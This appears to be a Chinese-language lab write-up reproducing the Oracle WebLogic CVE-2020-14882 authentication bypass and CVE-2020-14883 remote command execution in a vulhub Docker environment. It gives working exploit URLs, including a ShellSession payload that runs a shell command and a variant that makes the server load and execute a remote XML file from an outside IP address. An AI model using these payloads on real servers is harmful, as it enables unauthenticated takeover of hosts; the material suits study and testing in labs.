漏洞环境:
vulhub
漏洞复现:
CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞的连锁,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机。
1.docker 开个环境:
2.使用payload绕过登录
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
3.第二个漏洞,CVE-2020-14883,有两种利用方式,一种是通过com.tangosol.coherence.mvel2.sh.ShellSession,一种是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext。
第一种
payload:http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/wa1ki0g1');")
成功执行:
注:这种利用方法只能在Weblogic 12.2.1及以上版本中使用,因为10.3.6没有类com.tangosol.coherence.mvel2.sh.ShellSession。
第二种:
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 是一种更常见的漏洞利用,它首先在 CVE-2019-2725 中引入,可用于任何 Weblogic 版本。
要利用FileSystemXmlApplicationContext,您需要制作一个精心制作的 XML 文件并将其提供在 Weblogic 可以访问的服务器上。
xmlpayload:
bash -c
然后通过以下 URL,Weblogic 将加载此 XML 并执行其中的命令:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://121.41.55.60/flag.xml”)
利用成功:
